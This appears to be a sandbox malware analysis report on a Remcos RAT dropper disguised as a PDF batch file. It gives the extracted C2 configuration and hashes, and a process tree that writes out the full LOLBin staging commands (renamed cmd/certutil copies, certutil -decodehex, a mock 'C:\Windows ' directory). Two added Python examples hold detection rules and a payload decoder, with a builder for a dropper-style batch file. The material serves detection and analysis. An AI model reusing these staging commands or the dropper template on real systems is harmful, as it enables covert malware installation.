Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-08-2024 08:36

General

  • Target

    PAYMENT TRANSFER ERROR.PDF.bat

  • Size

    6.1MB

  • MD5

    9981f8d217254ed2a4cb7a3356535cd5

  • SHA1

    7ae24e3a9c0a28901c24958a17bdf8b344eab454

  • SHA256

    de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046

  • SHA512

    6f2168d9e024df2e0e196ecc5896bd42046c16e0dae8bf20c6f16ae7f46ce89f88730847cb878dfe4079a851405456a8ad024a35f2642ed8442c721172465ac2

  • SSDEEP

    49152:W8rzn3QeR6gIn+Sk954nuF83R5H93MUJBHeMrdrekrLwptyyD4kA+mfMea6Nc6:+

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:59089

legacyrem.duckdns.org:59089

Attributes
  • audio_folder: MicRecords
  • audio_record_time: 5
  • connect_delay: 0
  • connect_interval: 1
  • copy_file: remcos.exe
  • copy_folder: Remcos
  • delete_file: false
  • hide_file: false
  • hide_keylog_file: false
  • install_flag: false
  • keylog_crypt: false
  • keylog_file: logs.dat
  • keylog_flag: false
  • keylog_folder: remcos
  • mouse_option: false
  • mutex: Rmc-BF03RK
  • screenshot_crypt: false
  • screenshot_flag: false
  • screenshot_folder: Screenshots
  • screenshot_path: %AppData%
  • screenshot_time: 10
  • take_screenshot_option: false
  • take_screenshot_time: 5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
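The signature labels above are the sandbox's own. What follows is an added example, not part of this report or of any vendor tooling, showing how the staging pattern recorded in this report's process tree (system binaries copied to C:\Users\Public under new names via extrac32/esentutl, certutil -decodehex run through a renamed copy, a "C:\Windows " directory with a trailing space, and a renamed ping used as a sleep) can be flagged from process-creation telemetry. The event records are constructed from the command lines in the tree, not captured logs; the field names, rule names and the two benign control events (PIDs 9001 and 9002) are the example's own.

```python
"""Detection rules for the LOLBin staging chain in this report's process tree.
Added example: not part of the sandbox report or any vendor's tooling. The
events below are constructed from the report's command lines, not captured
telemetry; field and rule names are the example's own."""
import re
from dataclasses import dataclass

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
STAGING_DIRS = (r"c:\users\public",)
# Utilities the chain abuses to copy cmd.exe, certutil.exe and ping.exe under new names.
COPY_TOOLS = {"extrac32", "esentutl", "xcopy", "certutil"}
# "C:\Windows " (trailing space) is the mock trusted directory per.exe runs from.
MOCK_DIR = re.compile(r'\\windows (\\|"|$)')


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str


def _norm(s: str) -> str:
    # The report renders some paths with doubled backslashes; collapse and lowercase.
    return s.replace("\\\\", "\\").lower()


def _tokens(cmdline: str) -> list:
    # Quoted strings or whitespace-separated words, quotes removed.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', _norm(cmdline))]


def _stem(token: str) -> str:
    # Basename without extension: "c:\users\public\kn" -> "kn", "extrac32.exe" -> "extrac32".
    return token.rsplit("\\", 1)[-1].split(".")[0]


def check(ev: ProcEvent) -> list:
    hits = []
    image = _norm(ev.image)
    base = image.rsplit("\\", 1)[-1]
    cmd = _norm(ev.cmdline)
    toks = _tokens(ev.cmdline)

    # R1: a copy/extract utility moving a System32 binary into a user-writable staging dir.
    if (any(_stem(t) in COPY_TOOLS for t in toks)
            and any(t.startswith(SYSTEM_DIRS) and t.endswith(".exe") for t in toks)
            and any(t.startswith(STAGING_DIRS) for t in toks)):
        hits.append("system_binary_staged")
    # R2: certutil's -decodehex invoked through a binary that is not named certutil.exe.
    if "-decodehex" in toks and base != "certutil.exe":
        hits.append("renamed_certutil_decode")
    # R3: any reference to "C:\Windows " with a trailing space (mock trusted directory).
    if MOCK_DIR.search(image) or MOCK_DIR.search(cmd):
        hits.append("mock_trusted_dir")
    # R4: loopback ping used as a delay, from a binary that is not ping.exe.
    if "127.0.0.1" in toks and "-n" in toks and base != "ping.exe":
        hits.append("renamed_ping_sleep")
    # R5: execution out of the staging directory itself.
    if image.startswith(STAGING_DIRS):
        hits.append("exec_from_staging_dir")
    return hits


def scan(events) -> dict:
    """Map PID -> rule hits, for events that triggered at least one rule."""
    out = {}
    for ev in events:
        hits = check(ev)
        if hits:
            out[ev.pid] = hits
    return out


# Constructed from the report's process tree (PIDs kept for cross-reference),
# plus two benign controls (PIDs 9001 and 9002 are invented).
EVENTS = [
    ProcEvent(2228, r"C:\Windows\System32\extrac32.exe",
              r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"'),
    ProcEvent(2248, r"C:\Users\Public\kn.exe",
              r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3'),
    ProcEvent(308, r"C:\Windows\SysWOW64\esentutl.exe",
              r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"),
    ProcEvent(2556, r"C:\Users\Public\alpha.pif",
              r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    ProcEvent(1448, r"C:\Users\Public\xpha.pif", r"C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"),
    ProcEvent(2812, r"C:\Windows \SysWOW64\per.exe", r'"C:\Windows \SysWOW64\per.exe"'),
    ProcEvent(9001, r"C:\Windows\System32\ping.exe", "ping 127.0.0.1 -n 4"),
    ProcEvent(9002, r"C:\Windows\System32\certutil.exe", "certutil -decodehex in.txt out.bin"),
]

if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, ", ".join(rules))
```

R2 and R4 key on the mismatch between the image name and the behaviour of the command line, which is what survives the renaming to kn.exe, alpha.pif and xpha.pif; R3 is the only rule that needs no context at all, since a legitimate "C:\Windows " with a trailing space has no reason to exist.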

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
      PID:2228
    • C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\system32\extrac32.exe
        extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        3⤵
        PID:1708
    • C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2284
      • C:\Users\Public\kn.exe
        C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3
        3⤵
        • Executes dropped EXE
        PID:2248
    • C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Users\Public\kn.exe
        C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10
        3⤵
        • Executes dropped EXE
        PID:2848
    • C:\Users\Public\Libraries\AHA.COM
      C:\Users\Public\Libraries\AHA.COM
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:760
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\SysWOW64\esentutl.exe
          C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          4⤵
          PID:1848
        • C:\Windows\SysWOW64\esentutl.exe
          C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:308
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:808
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2556
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Users\Public\xpha.pif
            C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1448
        • C:\Windows \SysWOW64\per.exe
          "C:\\Windows \\SysWOW64\\per.exe
          4⤵
          • Executes dropped EXE
          PID:1852
        • C:\Windows \SysWOW64\per.exe
          "C:\Windows \SysWOW64\per.exe"
          4⤵
          • Executes dropped EXE
          PID:2812
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2072
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2920
        • C:\Users\Public\alpha.pif
          C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2992
      • C:\Windows\SysWOW64\esentutl.exe
        C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o
        3⤵
        PID:740
      • C:\Windows\SysWOW64\SndVol.exe
        C:\Windows\System32\SndVol.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1144
    • C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      2⤵
      • Executes dropped EXE
      PID:1700
    • C:\Users\Public\alpha.exe
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S
      2⤵
      • Executes dropped EXE
      PID:2168
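The process tree shows the batch file being decoded in two certutil -decodehex passes: the .bat itself is decoded with type 3 into AHA.GIF (4.2MB), and AHA.GIF is decoded with type 10 into AHA.COM (1.2MB), which is then executed. The following is an added example, not the report's tooling, that re-implements both passes so the dropped executable can be recovered statically. It assumes that certutil's trailing type argument is the CryptStringToBinary flag from wincrypt.h (3 = CRYPT_STRING_BASE64REQUESTHEADER, a base64 body between -----BEGIN/END ...----- markers; 10 = CRYPT_STRING_HEXADDR, lines of an offset followed by hex bytes), and that the intermediate uses the offset-then-bytes layout CryptBinaryToString emits; the real intermediate is not shown in this report, so decode_hexaddr may need adjusting. The batch file built inside the block is a constructed stand-in around a fake payload, not the real sample.

```python
"""Static re-implementation of the two certutil -decodehex stages in this
report's process tree, so the dropped executable can be recovered from the
batch file without running it. Added example, not the report's tooling.
Assumptions: the trailing type argument is the CryptStringToBinary flag from
wincrypt.h (3 = CRYPT_STRING_BASE64REQUESTHEADER, 10 = CRYPT_STRING_HEXADDR);
the hex stage follows the offset-then-bytes layout CryptBinaryToString emits.
The batch file built below is a constructed stand-in, not the real sample."""
import base64
import hashlib
import re

# Lenient on the label: "NEW CERTIFICATE REQUEST" is what the type-3 flag names,
# but any -----BEGIN x----- / -----END x----- pair is accepted here (assumption).
PEM_BLOCK = re.compile(r"-----BEGIN [^\r\n-]+-----(.*?)-----END [^\r\n-]+-----", re.S)


def decode_base64_request_header(text: str) -> bytes:
    """Stage 1 (type 3): base64 body between the BEGIN/END markers. Everything
    outside the block (the batch commands) is ignored, which is why a .bat can
    double as the container."""
    m = PEM_BLOCK.search(text)
    if not m:
        raise ValueError("no BEGIN/END block found")
    return base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)


def decode_hexaddr(text: str) -> bytes:
    """Stage 2 (type 10): each line is '<offset> <byte> <byte> ...'; the first
    token is the offset and is discarded, the rest are hex byte pairs."""
    out = bytearray()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        out += bytes.fromhex("".join(parts[1:]))
    return bytes(out)


def extract_payload(bat_text: str) -> bytes:
    stage1 = decode_base64_request_header(bat_text)   # equivalent of AHA.GIF
    return decode_hexaddr(stage1.decode("ascii"))      # equivalent of AHA.COM


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# --- constructed sample, used only to exercise the decoder offline ----------

def encode_hexaddr(data: bytes, width: int = 16) -> str:
    """Inverse of decode_hexaddr, mimicking the CRYPT_STRING_HEXADDR layout."""
    lines = [f"{off:04x}\t" + " ".join(f"{b:02x}" for b in data[off:off + width])
             for off in range(0, len(data), width)]
    return "\r\n".join(lines) + "\r\n"


def build_sample_bat(payload: bytes) -> str:
    """Batch commands mirroring the report's chain, followed by the blob."""
    b64 = base64.b64encode(encode_hexaddr(payload).encode("ascii")).decode("ascii")
    wrapped = "\r\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return (
        "@echo off\r\n"
        "extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe\r\n"
        "C:\\Users\\Public\\kn -decodehex -F \"%~f0\" C:\\Users\\Public\\AHA.GIF 3\r\n"
        "C:\\Users\\Public\\kn -decodehex -F C:\\Users\\Public\\AHA.GIF "
        "C:\\Users\\Public\\Libraries\\AHA.COM 10\r\n"
        "exit /b\r\n"
        "-----BEGIN NEW CERTIFICATE REQUEST-----\r\n"
        f"{wrapped}\r\n"
        "-----END NEW CERTIFICATE REQUEST-----\r\n"
    )


FAKE_PE = b"MZ\x90\x00" + bytes(range(256)) * 3   # stand-in payload, not a real PE
SAMPLE_BAT = build_sample_bat(FAKE_PE)

if __name__ == "__main__":
    recovered = extract_payload(SAMPLE_BAT)
    print(len(recovered), "bytes, sha256", sha256_hex(recovered))
```

Run against the real PAYMENT TRANSFER ERROR.PDF.bat, the check is that sha256_hex of the stage-1 output matches the AHA.GIF hash listed under Downloads and the final output matches the AHA.COM hash; a mismatch on the second stage points at a hex layout the simplified decode_hexaddr does not handle rather than at the wrong payload.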

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\ProgramData\remcos\logs.dat

            Filesize

            222B

            MD5

            b875da0a35144e3e532af56571df9959

            SHA1

            ba378dcc14882571fd7c23e680bd7c499644dba9

            SHA256

            aeb083a04ac3b1472d18bf411feee008fdd4a9f43d698d472b22799565064235

            SHA512

            238710866ca2d659047c88e059367896e4d39cdef43c3fb6dc3210d3772a3ed3f6d1aa2169bca8925d91c9803407c70014e483e09cd3ae07ea71e782dd12bda6

          • C:\Users\Admin\AppData\Local\Temp\CabB6E3.tmp

            Filesize

            70KB

            MD5

            49aebf8cbd62d92ac215b2923fb1b9f5

            SHA1

            1723be06719828dda65ad804298d0431f6aff976

            SHA256

            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

            SHA512

            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

          • C:\Users\Admin\AppData\Local\Temp\TarB714.tmp

            Filesize

            181KB

            MD5

            4ea6026cf93ec6338144661bf1202cd1

            SHA1

            a1dec9044f750ad887935a01430bf49322fbdcb7

            SHA256

            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

            SHA512

            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

          • C:\Users\Public\AHA.GIF

            Filesize

            4.2MB

            MD5

            2ddfa3ebd56847d40e59f092be0e6568

            SHA1

            3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827

            SHA256

            11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02

            SHA512

            92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

          • C:\Users\Public\Libraries\AHA.COM

            Filesize

            1.2MB

            MD5

            d70fa5471771d18888f0861ac060a914

            SHA1

            83ef28ef9e4850629433f497fd0360120449e297

            SHA256

            31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753

            SHA512

            af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

          • C:\Users\Public\Libraries\jkzjblcW.cmd

            Filesize

            60KB

            MD5

            b87f096cbc25570329e2bb59fee57580

            SHA1

            d281d1bf37b4fb46f90973afc65eece3908532b2

            SHA256

            d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e

            SHA512

            72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

          • C:\Users\Public\xpha.pif

            Filesize

            15KB

            MD5

            6242e3d67787ccbf4e06ad2982853144

            SHA1

            6ac7947207d999a65890ab25fe344955da35028e

            SHA256

            4ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d

            SHA512

            7d0d457e1537d624119a8023bcc086575696a5739c0460ef11554afac13af5e5d1edc7629a10e62834aba9f1b3ab1442011b15b4c3930399d91dca34b3b1cbaf

          • C:\Windows \SysWOW64\per.exe

            Filesize

            94KB

            MD5

            869640d0a3f838694ab4dfea9e2f544d

            SHA1

            bdc42b280446ba53624ff23f314aadb861566832

            SHA256

            0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

            SHA512

            6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

          • \Users\Public\alpha.exe

            Filesize

            337KB

            MD5

            5746bd7e255dd6a8afa06f7c42c1ba41

            SHA1

            0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

            SHA256

            db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

            SHA512

            3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

          • \Users\Public\alpha.pif

            Filesize

            295KB

            MD5

            ad7b9c14083b52bc532fba5948342b98

            SHA1

            ee8cbf12d87c4d388f09b4f69bed2e91682920b5

            SHA256

            17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae

            SHA512

            e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1

          • \Users\Public\kn.exe

            Filesize

            1.1MB

            MD5

            ec1fd3050dbc40ec7e87ab99c7ca0b03

            SHA1

            ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

            SHA256

            1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

            SHA512

            4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

          • memory/760-38-0x0000000000400000-0x0000000000540000-memory.dmp

            Filesize

            1.2MB

          • memory/760-36-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

            Filesize

            16.0MB

          • memory/760-34-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

            Filesize

            16.0MB

          • memory/1144-141-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-157-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-143-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-137-0x0000000002640000-0x0000000003640000-memory.dmp

            Filesize

            16.0MB

          • memory/1144-145-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-146-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-147-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-148-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-149-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-150-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-156-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-142-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-138-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-164-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-165-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-168-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-171-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-172-0x000000002BF60000-0x000000002BF79000-memory.dmp

            Filesize

            100KB

          • memory/1144-173-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-178-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB

          • memory/1144-179-0x000000002C460000-0x000000002C4E2000-memory.dmp

            Filesize

            520KB